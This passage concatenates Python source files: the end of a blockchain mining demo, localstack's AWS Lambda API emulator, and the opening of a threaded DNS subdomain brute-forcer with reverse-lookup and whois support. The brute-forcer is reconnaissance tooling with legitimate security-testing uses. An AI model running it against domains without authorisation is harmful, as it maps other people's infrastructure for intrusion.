                    if msg['request']:
                        # for purposes of this demo we need to query the
                        # blockchain
                        answer(msg, blockchain)
                except KeyError:
                    # a new block was sent to the blockchain network and is
                    # gonna be send to each miner in the network
                    miners(msg, blockchain)
def miners(block, blockchain):
    """Creates miners as independent processes and if a new block is
    validated it's added to the blockchain.

    :type block: dict
    :type blockchain: list
    """
    # create a shared variable and initialize it
    # the var is used for communication between processes (miners), when one
    # of them finds the hash of a block, the others will validate the block
    new_block = Manager().dict()
    new_block["block"] = None
    new_block["validated"] = None
    # in order to simplify this demo, miners will not communicate over p2p,
    # network but they will be simulated by independent processes
    # let's create 3 miners which will compete in finding a hash
    miners_lst = []
    for i in range(3):
        miners_lst.append(Miner(i, block, blockchain, DIFFICULTY, new_block))
    # run each miner independently
    jobs = []
    for miner in miners_lst:
        p = Process(target=miner.mine)
        jobs.append(p)
        p.start()
    # join processes
    for p in jobs:
        # NOTE: the processes will be joined here, which means processes which
        # got earlier to this point will wait for the rest of them
        # ^^ above said, we'll wait until all processes validate the block,
        # if any of them rejects it, the block will not be put into the
        # blockchain in the next step
        p.join()
    # check if others have validated the block
    if new_block["validated"]:
        # add the block to the blockchain
        blockchain.append(new_block["block"].get_block_obj(True))
        # TODO nice print so that it's more readable during presentation
        print_blockchain(blockchain)
    else:
        print("The block has been rejected!")
def print_blockchain(blockchain):
    """Dump the whole chain to stdout: a header, then each block separated
    by a blank line."""
    print("\n")
    print("BLOCKCHAIN CONTENT")
    for entry in blockchain:
        print("\n")
        print(entry)
def answer(msg, blockchain):
    """Handle a query message; only 'history' requests are supported.

    Prints every block whose 'car' payload matches msg['car_id'].
    """
    print("\n")
    if msg["request"] != "history":
        return
    for entry in blockchain:
        try:
            car = ast.literal_eval(entry['car'])
        except ValueError:
            # it was the genesis block (its 'car' is not a parsable literal)
            continue
        if car['id'] == msg['car_id']:
            print("\n")
            print(entry)
if __name__ == '__main__':
    # Start the blockchain demo server (blocks forever in the accept loop).
    main()
|
lambda_api.py | from __future__ import print_function
import os
import re
import sys
import json
import uuid
import time
import traceback
import logging
import base64
import threading
import imp
import glob
import subprocess
from io import BytesIO
from datetime import datetime
from multiprocessing import Process, Queue
from six import iteritems
from six.moves import cStringIO as StringIO
from flask import Flask, Response, jsonify, request, make_response
from localstack import config
from localstack.constants import *
from localstack.services import generic_proxy
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.common import *
from localstack.utils.aws import aws_stack
from localstack.utils.analytics import event_publisher
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched
APP_NAME = 'lambda_api'
PATH_ROOT = '/2015-03-31'
ARCHIVE_FILE_PATTERN = '%s/lambda.handler.*.jar' % config.TMP_FOLDER
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SCRIPT_PATTERN = '%s/lambda_script_*.py' % config.TMP_FOLDER
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
LAMBDA_RUNTIME_PYTHON27 = 'python2.7'
LAMBDA_RUNTIME_NODEJS = 'nodejs'
LAMBDA_RUNTIME_NODEJS610 = 'nodejs6.10'
LAMBDA_RUNTIME_JAVA8 = 'java8'
LAMBDA_DEFAULT_HANDLER = 'handler.handler'
LAMBDA_DEFAULT_RUNTIME = LAMBDA_RUNTIME_PYTHON27
LAMBDA_DEFAULT_STARTING_POSITION = 'LATEST'
LAMBDA_DEFAULT_TIMEOUT = 60
LAMBDA_ZIP_FILE_NAME = 'original_lambda_archive.zip'
# IP address of Docker bridge
DOCKER_BRIDGE_IP = '172.17.0.1'
app = Flask(APP_NAME)
# map ARN strings to lambda function objects
# TODO: create a single map for function details
lambda_arn_to_function = {}
lambda_arn_to_cwd = {}
lambda_arn_to_handler = {}
lambda_arn_to_runtime = {}
# list of event source mappings for the API
event_source_mappings = []
# logger
LOG = logging.getLogger(__name__)
# mutex for access to CWD
cwd_mutex = threading.Semaphore(1)
# whether to use Docker for execution
DO_USE_DOCKER = None
def cleanup():
    """Reset all in-memory Lambda API state: function maps, cwd/handler/runtime
    maps, and the event source mappings.

    BUG FIX: lambda_arn_to_runtime was missing from the `global` declaration,
    so the assignment below created a function-local dict and the module-level
    runtime map was never actually cleared.
    """
    global lambda_arn_to_function, lambda_arn_to_cwd, lambda_arn_to_handler
    global lambda_arn_to_runtime, event_source_mappings
    # reset the state
    lambda_arn_to_function = {}
    lambda_arn_to_cwd = {}
    lambda_arn_to_handler = {}
    lambda_arn_to_runtime = {}
    event_source_mappings = []
def func_arn(function_name):
    # Build the full Lambda ARN for a plain function name via the aws_stack helper.
    return aws_stack.lambda_function_arn(function_name)
def add_function_mapping(lambda_name, lambda_handler, lambda_cwd=None):
    # Register the handler callable and its working directory under the
    # function's ARN in the module-level lookup maps.
    arn = func_arn(lambda_name)
    lambda_arn_to_function[arn] = lambda_handler
    lambda_arn_to_cwd[arn] = lambda_cwd
def add_event_source(function_name, source_arn):
    """Create an event source mapping (source ARN -> function) and return it.

    The mapping dict mimics the AWS Lambda API response shape; note the
    'UUID' key, which other functions must use to look mappings up.
    """
    mapping = {
        "UUID": str(uuid.uuid4()),
        "StateTransitionReason": "User action",
        "LastModified": float(time.mktime(datetime.utcnow().timetuple())),
        "BatchSize": 100,
        "State": "Enabled",
        "FunctionArn": func_arn(function_name),
        "EventSourceArn": source_arn,
        "LastProcessingResult": "OK",
        "StartingPosition": LAMBDA_DEFAULT_STARTING_POSITION
    }
    event_source_mappings.append(mapping)
    return mapping
def update_event_source(uuid_value, function_name, enabled, batch_size):
    """Update the mapping identified by `uuid_value`; return it, or {} if absent.

    A falsy `function_name` leaves the FunctionArn untouched.
    """
    for mapping in event_source_mappings:
        if mapping['UUID'] != uuid_value:
            continue
        if function_name:
            mapping['FunctionArn'] = func_arn(function_name)
        mapping['BatchSize'] = batch_size
        mapping['State'] = 'Enabled' if enabled else 'Disabled'
        mapping['LastModified'] = float(time.mktime(datetime.utcnow().timetuple()))
        return mapping
    return {}
def delete_event_source(uuid_value):
    """Remove and return the event source mapping with the given UUID.

    Returns {} when no mapping matches. Mappings are stored with the key
    'UUID' (see add_event_source); the previous code compared against
    m['uuid'] and therefore raised KeyError / could never match.
    """
    for i, m in enumerate(event_source_mappings):
        if uuid_value == m['UUID']:
            return event_source_mappings.pop(i)
    return {}
def use_docker():
    """Lazily decide whether Lambdas should run inside Docker containers.

    Cached in the module-level DO_USE_DOCKER flag: Docker is used only when
    config.LAMBDA_EXECUTOR == 'docker' AND the `docker` CLI responds.
    """
    global DO_USE_DOCKER
    if DO_USE_DOCKER is None:
        DO_USE_DOCKER = False
        if config.LAMBDA_EXECUTOR == 'docker':
            try:
                # probe for a reachable Docker daemon; any failure keeps the flag False
                run('docker images', print_error=False)
                # run('ping -c 1 -t 1 %s' % DOCKER_BRIDGE_IP, print_error=False)
                DO_USE_DOCKER = True
            except Exception as e:
                pass
    return DO_USE_DOCKER
def process_apigateway_invocation(func_arn, path, payload, headers=None, path_params=None):
    """Invoke the Lambda registered under `func_arn` with an API-Gateway-style event.

    Returns the Lambda result, or None when invocation fails (the failure is
    logged, not raised — best-effort delivery).
    """
    # `headers={}` / `path_params={}` were mutable default arguments (shared
    # across calls); use None sentinels instead. Callers passing dicts see no
    # difference.
    headers = {} if headers is None else headers
    path_params = {} if path_params is None else path_params
    try:
        lambda_function = lambda_arn_to_function[func_arn]
        # event mirrors the AWS API Gateway proxy integration payload
        event = {
            'path': path,
            'headers': dict(headers),
            'pathParameters': dict(path_params),
            'body': payload,
            'isBase64Encoded': False,
            'resource': 'TODO',
            'httpMethod': 'TODO',
            'queryStringParameters': {},  # TODO
            'stageVariables': {}  # TODO
        }
        return run_lambda(lambda_function, event=event, context={}, func_arn=func_arn)
    except Exception as e:
        LOG.warning('Unable to run Lambda function on API Gateway message: %s %s' % (e, traceback.format_exc()))
def process_sns_notification(func_arn, topic_arn, message, subject=''):
    """Invoke the Lambda registered under `func_arn` with an SNS-style event.

    The Lambda result is discarded; failures are logged and swallowed
    (best-effort delivery).
    """
    try:
        lambda_function = lambda_arn_to_function[func_arn]
        # event mirrors the AWS SNS -> Lambda record format
        event = {
            'Records': [{
                'Sns': {
                    'Type': 'Notification',
                    'TopicArn': topic_arn,
                    'Subject': subject,
                    'Message': message,
                    # timestamp()/TIMESTAMP_FORMAT_MILLIS are project helpers
                    'Timestamp': timestamp(format=TIMESTAMP_FORMAT_MILLIS)
                }
            }]
        }
        run_lambda(lambda_function, event=event, context={}, func_arn=func_arn)
    except Exception as e:
        LOG.warning('Unable to run Lambda function on SNS message: %s %s' % (e, traceback.format_exc()))
def process_kinesis_records(records, stream_name):
    """Feed a batch of Kinesis records into every Lambda listening on the stream.

    One invocation per event source mapping, with all records bundled into a
    single event. Failures are logged and swallowed.
    """
    # feed records into listening lambdas
    try:
        stream_arn = aws_stack.kinesis_stream_arn(stream_name)
        sources = get_event_sources(source_arn=stream_arn)
        for source in sources:
            arn = source['FunctionArn']
            lambda_function = lambda_arn_to_function[arn]
            event = {
                'Records': []
            }
            for rec in records:
                event['Records'].append({
                    'kinesis': rec
                })
            run_lambda(lambda_function, event=event, context={}, func_arn=arn)
    except Exception as e:
        LOG.warning('Unable to run Lambda function on Kinesis records: %s %s' % (e, traceback.format_exc()))
def get_event_sources(func_name=None, source_arn=None):
    """Return event source mappings, optionally filtered by function and/or source.

    `func_name` matches either the plain name or the full ARN; `source_arn`
    matches by prefix.
    """
    def matches(mapping):
        if func_name and mapping['FunctionArn'] not in (func_name, func_arn(func_name)):
            return False
        if source_arn and not mapping['EventSourceArn'].startswith(source_arn):
            return False
        return True
    return [m for m in event_source_mappings if matches(m)]
def get_host_path_for_path_in_docker(path):
    """Translate a container-local temp path into the corresponding host path.

    Needed when localstack itself runs inside Docker: volumes mounted into a
    spawned Lambda container must reference the host's temp folder, not ours.
    """
    return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
        r'%s/\1' % config.HOST_TMP_FOLDER, path)
@cloudwatched('lambda')
def run_lambda(func, event, context, func_arn, suppress_output=False):
    """Execute a Lambda function, either inside a lambci Docker container or in-process.

    :param func: the Python callable to run (ignored on the Docker path, where
        the registered runtime/handler for `func_arn` is used instead)
    :param event: event dict passed to the handler (an empty dict if falsy)
    :param context: context object passed to the handler
    :param func_arn: ARN key into the lambda_arn_to_* registries
    :param suppress_output: redirect stdout/stderr into a StringIO while running
    :return: the handler's result, or an error_response(...) on failure
    """
    if suppress_output:
        stdout_ = sys.stdout
        stderr_ = sys.stderr
        stream = StringIO()
        sys.stdout = stream
        sys.stderr = stream
    lambda_cwd = lambda_arn_to_cwd.get(func_arn)
    result = None
    try:
        runtime = lambda_arn_to_runtime.get(func_arn)
        handler = lambda_arn_to_handler.get(func_arn)
        if use_docker():
            handler_args = '"%s"' % handler
            entrypoint = ''
            # prepare event body
            if not event:
                LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
                event = {}
            event_body = json.dumps(event)
            # if running a Java Lambda, set up classpath arguments
            if runtime == LAMBDA_RUNTIME_JAVA8:
                # copy executor jar into temp directory
                cp_r(LAMBDA_EXECUTOR_JAR, lambda_cwd)
                # TODO cleanup once we have custom Java Docker image
                taskdir = '/var/task'
                event_file = 'event_file.json'
                save_file(os.path.join(lambda_cwd, event_file), event_body)
                handler_args = ("bash -c 'cd %s; java -cp .:`ls *.jar | tr \"\\n\" \":\"` \"%s\" \"%s\" \"%s\"'" %
                    (taskdir, LAMBDA_EXECUTOR_CLASS, handler, event_file))
                entrypoint = ' --entrypoint ""'
            if config.LAMBDA_REMOTE_DOCKER:
                # remote daemon: `docker cp` the code in, since host volumes don't work
                cmd = (
                    'CONTAINER_ID="$(docker create'
                    '%s -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
                    ' -e HOSTNAME="$HOSTNAME"'
                    ' "lambci/lambda:%s" %s'
                    ')";'
                    'docker cp "%s/." "$CONTAINER_ID:/var/task";'
                    'docker start -a "$CONTAINER_ID";'
                ) % (entrypoint, runtime, handler_args, lambda_cwd)
            else:
                # local daemon: mount the code directory as /var/task
                lambda_cwd_on_host = get_host_path_for_path_in_docker(lambda_cwd)
                cmd = (
                    'docker run'
                    '%s -v "%s":/var/task'
                    ' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
                    ' -e HOSTNAME="$HOSTNAME"'
                    ' "lambci/lambda:%s" %s'
                ) % (entrypoint, lambda_cwd_on_host, runtime, handler_args)
            # NOTE(review): looks like leftover debug output — consider LOG.debug
            print(cmd)
            event_body_escaped = event_body.replace("'", "\\'")
            # lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
            env_vars = {
                'AWS_LAMBDA_EVENT_BODY': event_body_escaped,
                'HOSTNAME': DOCKER_BRIDGE_IP
            }
            result, log_output = run_lambda_executor(cmd, env_vars)
            LOG.debug('Lambda log output:\n%s' % log_output)
        else:
            # execute the Lambda function in a forked sub-process, sync result via queue
            queue = Queue()
            def do_execute():
                # now we're executing in the child process, safe to change CWD
                if lambda_cwd:
                    os.chdir(lambda_cwd)
                result = func(event, context)
                queue.put(result)
            process = Process(target=do_execute)
            # NOTE(review): Process.run() executes the target synchronously in
            # THIS process (no fork), so the os.chdir above affects the parent
            # — presumably start()/join() was intended; confirm before changing.
            process.run()
            result = queue.get()
    except Exception as e:
        return error_response("Error executing Lambda function: %s %s" % (e, traceback.format_exc()))
    finally:
        if suppress_output:
            sys.stdout = stdout_
            sys.stderr = stderr_
    return result
def exec_lambda_code(script, handler_function='handler', lambda_cwd=None):
    """Load Lambda source code as a module and return its handler function.

    Writes `script` to a temp file, imports it via imp.load_source, and returns
    the attribute named `handler_function`. If `lambda_cwd` is given, the CWD
    and sys.path are temporarily switched under the module-level cwd_mutex,
    and restored in the finally block.

    :raises Exception: re-raises any import/exec failure (after logging it)
    :raises KeyError: if the module has no attribute `handler_function`
    """
    if lambda_cwd:
        # serialize CWD changes across concurrent deployments
        cwd_mutex.acquire()
        previous_cwd = os.getcwd()
        os.chdir(lambda_cwd)
        sys.path = [lambda_cwd] + sys.path
    # generate lambda file name
    lambda_id = 'l_%s' % short_uid()
    lambda_file = LAMBDA_SCRIPT_PATTERN.replace('*', lambda_id)
    save_file(lambda_file, script)
    # delete temporary .py and .pyc files on exit
    TMP_FILES.append(lambda_file)
    TMP_FILES.append('%sc' % lambda_file)
    try:
        # NOTE: `imp` is deprecated in Python 3 in favor of importlib
        handler_module = imp.load_source(lambda_id, lambda_file)
        module_vars = handler_module.__dict__
    except Exception as e:
        LOG.error('Unable to exec: %s %s' % (script, traceback.format_exc()))
        raise e
    finally:
        if lambda_cwd:
            os.chdir(previous_cwd)
            sys.path.pop(0)
            cwd_mutex.release()
    return module_vars[handler_function]
def get_handler_file_from_name(handler_name, runtime=LAMBDA_RUNTIME_PYTHON27):
    """Map a handler name like 'index.handler' to its source file ('index.js'/'index.py')."""
    # TODO: support Java Lambdas in the future
    module_name = handler_name.split('.')[0]
    extension = '.js' if runtime.startswith(LAMBDA_RUNTIME_NODEJS) else '.py'
    return module_name + extension
def get_handler_function_from_name(handler_name, runtime=LAMBDA_RUNTIME_PYTHON27):
    """Return the function portion of a handler name ('index.handler' -> 'handler')."""
    # TODO: support Java Lambdas in the future
    return handler_name.rsplit('.', 1)[-1]
def error_response(msg, code=400, error_type='Exception'):
    """Build an AWS-style JSON error response (and log the message).

    The error type is conveyed via the 'x-amzn-errortype' header, matching
    what AWS SDK clients expect.
    """
    LOG.warning(msg)
    result = {'Type': 'User', 'message': msg}
    headers = {'x-amzn-errortype': error_type}
    return make_response((jsonify(result), code, headers))
def run_lambda_executor(cmd, env_vars={}):
    """Run an executor shell command and return (stdout_result, stderr_logs).

    :raises Exception: when the process exits non-zero (stderr included).
    NOTE(review): the `async=True` keyword argument is a SyntaxError on
    Python >= 3.7 (`async` became a reserved word) — this file targets an
    older interpreter, or the `run` helper needs a renamed parameter; verify.
    NOTE(review): `env_vars={}` is a mutable default; harmless here since it
    is only read, but worth normalizing alongside any other change.
    """
    process = run(cmd, async=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE, env_vars=env_vars)
    return_code = process.wait()
    result = to_str(process.stdout.read())
    log_output = to_str(process.stderr.read())
    if return_code != 0:
        raise Exception('Lambda process returned error status code: %s. Output:\n%s' %
            (return_code, log_output))
    return result, log_output
def set_function_code(code, lambda_name):
    """Materialize a function's code archive and register an executable handler.

    :param code: AWS 'Code' dict — either {'S3Bucket','S3Key'} or {'ZipFile': b64}
    :param lambda_name: function name (must already have a runtime registered)
    :return: an error_response(...) on failure, otherwise None
    :raises Exception: when the archive is neither ZIP nor JAR, or the Python
        handler cannot be loaded
    """
    def generic_handler(event, context):
        # placeholder used when no concrete executor could be resolved
        raise Exception(('Unable to find executor for Lambda function "%s". ' +
            'Note that Node.js Lambdas currently require LAMBDA_EXECUTOR=docker') % lambda_name)
    lambda_handler = generic_handler
    lambda_cwd = None
    arn = func_arn(lambda_name)
    runtime = lambda_arn_to_runtime[arn]
    handler_name = lambda_arn_to_handler.get(arn)
    if not handler_name:
        handler_name = LAMBDA_DEFAULT_HANDLER
    handler_file = get_handler_file_from_name(handler_name, runtime=runtime)
    handler_function = get_handler_function_from_name(handler_name, runtime=runtime)
    # fetch the archive bytes, either from S3 or inline (base64)
    if 'S3Bucket' in code:
        s3_client = aws_stack.connect_to_service('s3')
        bytes_io = BytesIO()
        try:
            s3_client.download_fileobj(code['S3Bucket'], code['S3Key'], bytes_io)
            zip_file_content = bytes_io.getvalue()
        except Exception as e:
            return error_response('Unable to fetch Lambda archive from S3: %s' % e, 404)
    elif 'ZipFile' in code:
        zip_file_content = code['ZipFile']
        zip_file_content = base64.b64decode(zip_file_content)
    else:
        return error_response('No valid Lambda archive specified.')
    # save tmp file
    tmp_dir = '%s/zipfile.%s' % (config.TMP_FOLDER, short_uid())
    run('mkdir -p %s' % tmp_dir)
    tmp_file = '%s/%s' % (tmp_dir, LAMBDA_ZIP_FILE_NAME)
    save_file(tmp_file, zip_file_content)
    TMP_FILES.append(tmp_dir)
    lambda_cwd = tmp_dir
    # check if this is a ZIP file
    is_zip = is_zip_file(zip_file_content)
    if is_zip:
        run('cd %s && unzip %s' % (tmp_dir, LAMBDA_ZIP_FILE_NAME))
        main_file = '%s/%s' % (tmp_dir, handler_file)
        if not os.path.isfile(main_file):
            # check if this is a zip file that contains a single JAR file
            jar_files = glob.glob('%s/*.jar' % tmp_dir)
            if len(jar_files) == 1:
                main_file = jar_files[0]
        if os.path.isfile(main_file):
            # from here on, zip_file_content holds the handler file's bytes
            with open(main_file, 'rb') as file_obj:
                zip_file_content = file_obj.read()
        else:
            file_list = run('ls -la %s' % tmp_dir)
            LOG.debug('Lambda archive content:\n%s' % file_list)
            return error_response('Unable to find handler script in Lambda archive.')
    # it could be a JAR file (regardless of whether wrapped in a ZIP file or not)
    is_jar = is_jar_archive(zip_file_content)
    if is_jar:
        def execute(event, context):
            # run the Java executor against the JAR with the event on disk
            event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
            save_file(event_file, json.dumps(event))
            TMP_FILES.append(event_file)
            class_name = lambda_arn_to_handler[arn].split('::')[0]
            classpath = '%s:%s' % (LAMBDA_EXECUTOR_JAR, main_file)
            cmd = 'java -cp %s %s %s %s' % (classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
            result, log_output = run_lambda_executor(cmd)
            LOG.info('Lambda output: %s' % log_output.replace('\n', '\n> '))
            return result
        lambda_handler = execute
    elif runtime.startswith('python') and not use_docker():
        # in-process Python execution: import the handler directly
        try:
            lambda_handler = exec_lambda_code(zip_file_content,
                handler_function=handler_function, lambda_cwd=lambda_cwd)
        except Exception as e:
            raise Exception('Unable to get handler function from lambda code.', e)
    if not is_zip and not is_jar:
        raise Exception('Uploaded Lambda code is neither a ZIP nor JAR file.')
    add_function_mapping(lambda_name, lambda_handler, lambda_cwd)
def do_list_functions():
    """Build the list of function metadata dicts for the ListFunctions API."""
    funcs = []
    for f_arn in list(lambda_arn_to_handler):
        # function name is the last ARN segment after ':function:'
        func_name = f_arn.split(':function:')[-1]
        arn = func_arn(func_name)
        entry = {
            'Version': '$LATEST',
            'FunctionName': func_name,
            'FunctionArn': f_arn,
            'Handler': lambda_arn_to_handler.get(arn),
            'Runtime': lambda_arn_to_runtime.get(arn),
            'Timeout': LAMBDA_DEFAULT_TIMEOUT,
            # 'Description': ''
            # 'MemorySize': 192,
            # 'CodeSize': 2526917
        }
        funcs.append(entry)
    return funcs
@app.route('%s/functions' % PATH_ROOT, methods=['POST'])
def create_function():
    """ Create new function
    ---
    operationId: 'createFunction'
    parameters:
        - name: 'request'
          in: body
    """
    try:
        data = json.loads(to_str(request.data))
        lambda_name = data['FunctionName']
        # notify analytics subscribers (the name is hashed, not sent raw)
        event_publisher.fire_event(event_publisher.EVENT_LAMBDA_CREATE_FUNC,
            payload={'n': event_publisher.get_hash(lambda_name)})
        arn = func_arn(lambda_name)
        if arn in lambda_arn_to_handler:
            return error_response('Function already exist: %s' %
                lambda_name, 409, error_type='ResourceConflictException')
        # register metadata first; set_function_code relies on these entries
        lambda_arn_to_handler[arn] = data['Handler']
        lambda_arn_to_runtime[arn] = data['Runtime']
        result = set_function_code(data['Code'], lambda_name)
        # set_function_code returns an error response on failure, else None
        return result or jsonify({})
    except Exception as e:
        return error_response('Unknown error: %s' % e)
@app.route('%s/functions/<function>' % PATH_ROOT, methods=['GET'])
def get_function(function):
    """ Get details for a single function
    ---
    operationId: 'getFunction'
    parameters:
        - name: 'request'
          in: body
        - name: 'function'
          in: path
    """
    funcs = do_list_functions()
    for func in funcs:
        if func['FunctionName'] == function:
            result = {
                'Configuration': func,
                # point clients at the /code sub-resource for the archive
                'Code': {
                    'Location': '%s/code' % request.url
                }
            }
            return jsonify(result)
    # not found: AWS-style 404 metadata payload
    result = {
        'ResponseMetadata': {
            'HTTPStatusCode': 404
        }
    }
    return make_response((jsonify(result), 404, {}))
@app.route('%s/functions/' % PATH_ROOT, methods=['GET'])
def list_functions():
    """ List functions
    ---
    operationId: 'listFunctions'
    parameters:
        - name: 'request'
          in: body
    """
    # single 'Functions' key, mirroring the AWS ListFunctions response shape
    return jsonify({'Functions': do_list_functions()})
@app.route('%s/functions/<function>' % PATH_ROOT, methods=['DELETE'])
def delete_function(function):
    """ Delete an existing function
    ---
    operationId: 'deleteFunction'
    parameters:
        - name: 'request'
          in: body
    """
    arn = func_arn(function)
    # popping the handler doubles as the existence check
    try:
        lambda_arn_to_handler.pop(arn)
    except KeyError:
        return error_response('Function does not exist: %s' % function, 404, error_type='ResourceNotFoundException')
    event_publisher.fire_event(event_publisher.EVENT_LAMBDA_DELETE_FUNC,
        payload={'n': event_publisher.get_hash(function)})
    lambda_arn_to_cwd.pop(arn, None)
    lambda_arn_to_function.pop(arn, None)
    # drop every event source mapping pointing at the deleted function,
    # mutating the shared list in place
    event_source_mappings[:] = [m for m in event_source_mappings if m['FunctionArn'] != arn]
    return jsonify({})
@app.route('%s/functions/<function>/code' % PATH_ROOT, methods=['PUT'])
def update_function_code(function):
    """ Update the code of an existing function
    ---
    operationId: 'updateFunctionCode'
    parameters:
        - name: 'request'
          in: body
    """
    data = json.loads(to_str(request.data))
    # set_function_code returns an error response on failure, else None
    result = set_function_code(data, function)
    return result or jsonify({})
@app.route('%s/functions/<function>/code' % PATH_ROOT, methods=['GET'])
def get_function_code(function):
    """ Get the code of an existing function
    ---
    operationId: 'getFunctionCode'
    parameters:
    """
    arn = func_arn(function)
    # NOTE(review): raises KeyError (-> HTTP 500) for unknown functions;
    # a 404 error_response would be more consistent with the other routes
    lambda_cwd = lambda_arn_to_cwd[arn]
    tmp_file = '%s/%s' % (lambda_cwd, LAMBDA_ZIP_FILE_NAME)
    # stream the originally uploaded archive back as a ZIP download
    return Response(load_file(tmp_file, mode="rb"),
        mimetype='application/zip',
        headers={'Content-Disposition': 'attachment; filename=lambda_archive.zip'})
@app.route('%s/functions/<function>/configuration' % PATH_ROOT, methods=['PUT'])
def update_function_configuration(function):
    """ Update the configuration of an existing function
    ---
    operationId: 'updateFunctionConfiguration'
    parameters:
        - name: 'request'
          in: body
    """
    data = json.loads(to_str(request.data))
    arn = func_arn(function)
    # only Handler and Runtime are supported; other fields are ignored
    if data.get('Handler'):
        lambda_arn_to_handler[arn] = data['Handler']
    if data.get('Runtime'):
        lambda_arn_to_runtime[arn] = data['Runtime']
    result = {}
    return jsonify(result)
@app.route('%s/functions/<function>/invocations' % PATH_ROOT, methods=['POST'])
def invoke_function(function):
    """ Invoke an existing function
    ---
    operationId: 'invokeFunction'
    parameters:
        - name: 'request'
          in: body
    """
    arn = func_arn(function)
    lambda_function = lambda_arn_to_function.get(arn)
    if not lambda_function:
        return error_response('Function does not exist: %s' % function, 404, error_type='ResourceNotFoundException')
    # the request body (if any) must be JSON and becomes the Lambda event
    data = None
    if request.data:
        try:
            data = json.loads(to_str(request.data))
        except Exception as e:
            return error_response('The payload is not JSON', 415, error_type='UnsupportedMediaTypeException')
    result = run_lambda(lambda_function, func_arn=arn, event=data, context={})
    # dict results are JSON-serialized; other truthy results returned as-is;
    # falsy results become an empty 200
    if isinstance(result, dict):
        return jsonify(result)
    if result:
        return result
    return make_response('', 200)
@app.route('%s/event-source-mappings/' % PATH_ROOT, methods=['GET'])
def list_event_source_mappings():
    """ List event source mappings
    ---
    operationId: 'listEventSourceMappings'
    """
    # optional exact-match filters from the query string
    event_source_arn = request.args.get('EventSourceArn')
    function_name = request.args.get('FunctionName')
    mappings = event_source_mappings
    if event_source_arn:
        mappings = [m for m in mappings if event_source_arn == m.get('EventSourceArn')]
    if function_name:
        function_arn = func_arn(function_name)
        mappings = [m for m in mappings if function_arn == m.get('FunctionArn')]
    response = {
        'EventSourceMappings': mappings
    }
    return jsonify(response)
@app.route('%s/event-source-mappings/' % PATH_ROOT, methods=['POST'])
def create_event_source_mapping():
    """ Create new event source mapping
    ---
    operationId: 'createEventSourceMapping'
    parameters:
        - name: 'request'
          in: body
    """
    data = json.loads(to_str(request.data))
    # registers the mapping globally and returns the created record
    mapping = add_event_source(data['FunctionName'], data['EventSourceArn'])
    return jsonify(mapping)
@app.route('%s/event-source-mappings/<mapping_uuid>' % PATH_ROOT, methods=['PUT'])
def update_event_source_mapping(mapping_uuid):
    """ Update an existing event source mapping
    ---
    operationId: 'updateEventSourceMapping'
    parameters:
        - name: 'request'
          in: body
    """
    data = json.loads(request.data)
    if not mapping_uuid:
        return jsonify({})
    function_name = data.get('FunctionName') or ''
    # `data.get('Enabled') or True` could never disable a mapping: an explicit
    # Enabled=False evaluated to (False or True) == True. Use a real default.
    enabled = data.get('Enabled', True)
    # same pattern for BatchSize: an explicit 0 used to be coerced to 100
    batch_size = data.get('BatchSize', 100)
    mapping = update_event_source(mapping_uuid, function_name, enabled, batch_size)
    return jsonify(mapping)
@app.route('%s/event-source-mappings/<mapping_uuid>' % PATH_ROOT, methods=['DELETE'])
def delete_event_source_mapping(mapping_uuid):
    """ Delete an event source mapping
    ---
    operationId: 'deleteEventSourceMapping'
    """
    if not mapping_uuid:
        return jsonify({})
    # returns the removed mapping, or {} when the UUID is unknown
    mapping = delete_event_source(mapping_uuid)
    return jsonify(mapping)
def serve(port, quiet=True):
    """Serve the Lambda API Flask app on the given port (blocking)."""
    generic_proxy.serve_flask_app(app=app, port=port, quiet=quiet)
|
dnsbrute.py | #!/usr/bin/env python3
import sys
import dns.resolver
import dns.reversename
import dns.exception
import netaddr
import ipwhois
import threading
import queue
import time
THREAD_COUNT = 256  # Minimum number of threads.
BLOCK_SIZE = 1024  # Smallest netblock on which we will do reverse lookups.
LIFETIME = 10.0  # Total time in seconds we will wait for a DNS response.
# Configure the resolver to use throughout the script.
# Note: its nameservers are replaced with the target domain's own NS in __main__.
resolver = dns.resolver.Resolver()
resolver.lifetime = LIFETIME
def parallel(func, items):
    """
    Run the given function in parallel.

    Use multithreading to run the given function and arguments in parallel.
    Each worker thread is called as func(fin, item_queue); setting the `fin`
    event asks workers to stop early (used on Ctrl-C). Blocks until all
    worker threads have exited, printing progress roughly every 1000 items.
    """
    # Setup the work and results queues and the finish event.
    item_queue = queue.Queue()
    fin = threading.Event()
    # Load the ports into the queue
    for i in items:
        item_queue.put(i)
    # Setup and launch threads.
    for i in range(THREAD_COUNT):
        t1 = threading.Thread(target=func, args=(fin, item_queue))
        t1.start()
    # Wait for threads to complete. Handle Ctrl-C if necessary.
    try:
        old_len = item_queue.qsize()
        while threading.active_count() > 1:
            time.sleep(2)
            new_len = item_queue.qsize()
            if (old_len - new_len) >= 1000:
                print('[+] {0} items remaining.'.format(new_len))
                old_len = new_len
    except KeyboardInterrupt:
        # signal workers to drain and exit
        fin.set()
def resolve(fqdn, rtype='A'):
    """
    Resolve a DNS query.

    Query the DNS server for a record of type rtype. The default is A records.
    Returns the answers as a list of strings; any DNS failure (NXDOMAIN,
    timeout, ...) yields an empty list.
    NOTE(review): Resolver.query() was renamed to resolve() in dnspython 2.0
    and later removed — verify the pinned dnspython version.
    """
    # Resolve our query and return a list of answers. If there are any
    # exceptions, print the exception and return an empty list.
    try:
        ans = resolver.query(fqdn, rtype)
        return [a.to_text() for a in ans]
    except dns.exception.DNSException:
        return []
def get_words(filename):
    """
    Get the wordlist from the file.

    Returns the file's lines with trailing whitespace removed, skipping empty
    lines and comment lines that start with '#'.
    """
    with open(filename) as wordfile:
        stripped = (line.rstrip() for line in wordfile)
        return [word for word in stripped if word and not word.startswith('#')]
def brute(fin, word_queue):
    """
